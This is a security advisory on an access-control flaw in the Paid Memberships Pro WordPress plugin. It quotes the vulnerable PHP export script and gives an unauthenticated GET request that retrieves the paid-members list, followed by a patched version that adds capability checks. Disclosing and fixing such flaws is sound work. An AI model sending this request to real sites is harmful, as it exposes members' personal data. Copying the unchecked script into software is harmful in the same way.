Advisory
Secunia Advisory SA 49630
Analysis of vulnerability
The page /adminpages/memberslist-csv.php is called through AJAX from admin pages, in order to export a CSV list of paid members on the WordPress site. It sets itself up like this:

```php
//this file is launched via AJAX to get various data from the DB for the stranger_products plugin

//wp includes
define('WP_USE_THEMES', false);
require('../../../../wp-load.php');

//get users
// note: no login or capability check precedes the handling of the request parameters below
if(isset($_REQUEST['s']))
    $s = $_REQUEST['s'];
else
    $s = "";

if(isset($_REQUEST['l']))
    $l = $_REQUEST['l'];
else
    $l = false;

//some vars for the search
if(!empty($_REQUEST['pn']))
    $pn = $_REQUEST['pn'];
else
    $pn = 1;

if(!empty($_REQUEST['limit']))
    $limit = $_REQUEST['limit'];
else
    $limit = false;

if($limit)
{
    $end = $pn * $limit;
    $start = $end - $limit;
}
```
Because the script never checks that the requester is logged in and holds sufficient rights, an unauthenticated client can simply request the page and receive the full list of paid members on the blog:

```http
GET /wordpress/wp-content/plugins/paid-memberships-pro/adminpages/memberslist-csv.php HTTP/1.1
Host: 192.168.80.130
```
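The fix the analysis implies is an authorization check placed before any request parameter is read. The following rewrite of the script's prologue is an added example, not the plugin's own code or its vendor's patch: it assumes the `manage_options` capability is the right privilege for exporting members (the plugin may use a different one) and uses only standard WordPress functions (`is_user_logged_in`, `current_user_can`, `wp_die`, `sanitize_text_field`, `absint`).

```php
<?php
// Added example (not the plugin's code): the same prologue with the missing
// authorization check inserted before the request is processed.
// 'manage_options' is an assumed capability; substitute the one the export really needs.
define('WP_USE_THEMES', false);
require('../../../../wp-load.php');

// Refuse unauthenticated and under-privileged requests before touching the database.
if (!is_user_logged_in() || !current_user_can('manage_options')) {
    wp_die('You are not allowed to export the members list.', '', array('response' => 403));
}

// Normalise the search and paging parameters to the types the query expects,
// so untrusted strings are never used directly as page numbers or limits.
$s     = isset($_REQUEST['s']) ? sanitize_text_field($_REQUEST['s']) : '';
$l     = isset($_REQUEST['l']) ? sanitize_text_field($_REQUEST['l']) : false;
$pn    = !empty($_REQUEST['pn']) ? max(1, absint($_REQUEST['pn'])) : 1;
$limit = !empty($_REQUEST['limit']) ? absint($_REQUEST['limit']) : false;

if ($limit) {
    $end   = $pn * $limit;
    $start = $end - $limit;
}
```

With this check in place the request shown above returns a 403 response instead of the CSV, and only an administrator already authenticated to the site can trigger the export.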